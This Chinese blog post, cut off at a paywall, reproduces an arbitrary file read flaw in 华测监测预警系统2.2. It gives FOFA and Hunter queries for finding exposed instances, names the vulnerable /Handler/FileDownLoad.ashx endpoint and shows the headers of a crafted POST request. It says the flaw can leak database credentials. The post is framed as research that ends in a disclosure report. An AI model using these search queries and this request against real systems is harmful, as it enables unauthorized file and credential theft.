目录
1. 资产搜集
直接上fofa 和 hunter
个人推荐hunter可以看到icp备案公司直接提交盒子就行了
FOFA语法 app=”华测监测预警系统2.2”
Hunter语法 web.body=”华测监测预警系统2.2”

2. 漏洞复现
这里手动复现的,目录是/Handler/FileDownLoad.ashx
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。
-
POST /Handler/FileDownLoad.ashx HTTP/1.1 -
Host: ip:port -
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) -
Accept-Encoding: gzip, deflate -
Accept: */* -
Connection: close

本文详细介绍了华测监测预警系统2.2的任意文件读取漏洞,包括资产搜集、漏洞复现和实战总结。通过使用fofa和hunter进行资产搜集,利用 Hunter 语法定位到目标系统。在漏洞复现中,揭示了/Handler/FileDownLoad.ashx的路径,通过修改POST参数实现文件下载,可能导致数据库凭证泄露。实战总结中,利用备案信息提交漏洞报告,成功处理安全问题。
最低0.47元/天 解锁文章
1380

被折叠的 条评论
为什么被折叠?



